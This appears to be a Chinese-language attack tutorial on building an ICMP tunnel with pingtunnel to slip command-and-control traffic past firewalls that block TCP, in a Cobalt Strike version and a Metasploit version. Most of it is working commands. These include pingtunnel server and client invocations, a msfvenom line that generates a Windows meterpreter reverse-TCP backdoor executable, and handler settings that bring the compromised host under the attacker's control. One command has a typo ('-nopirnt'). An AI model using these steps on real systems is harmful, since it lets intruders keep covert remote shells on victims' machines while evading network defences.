目录
一、背景
防火墙限制了TCP数据包的出入站,在这样的背景下,我们可以将TCP的数据包伪装成ICMP、DNS、SMB的数据包。
本文将对ICMP来进行搭建隧道。
二、实现ICMP步骤
2.1 CS实现ICMP隧道搭建
1)首先在CS上启动两个监听器,一个负责监听被攻击主机的3333端口,一个负责监听攻击主机的2222端口。
攻击主机
被攻击主机
2)生成后门程序
注:payload要选择被攻击主机的监听器
3)启动pingtunnel服务端【在kali启动】
进入到pingtunnel文件夹,启动服务端
./pingtunnel -type server
4)启动pingtunnel客户端【在客户端启动】
进入到pingtunnel文件夹,启动客户端
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 172.16.100.108 -t 172.16.100.222:2222 -tcp 1 -noprint 1 -nolog 1
5)运行后门程序
完成主机上线。
2.2 MSF实现ICMP隧道搭建
1)生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe>/home/share/3333.exe
2)创建监听器
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 2222
3)搭建隧道,启动服务端
./pingtunnel -type server
4)启动客户端
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 172.16.100.108 -t 172.16.100.108:2222 -tcp 1 -nopirnt 1 -nolog 1
5)运行后门程序
先运行后门程序,之后msf控制台执行命令run
完成主机上线。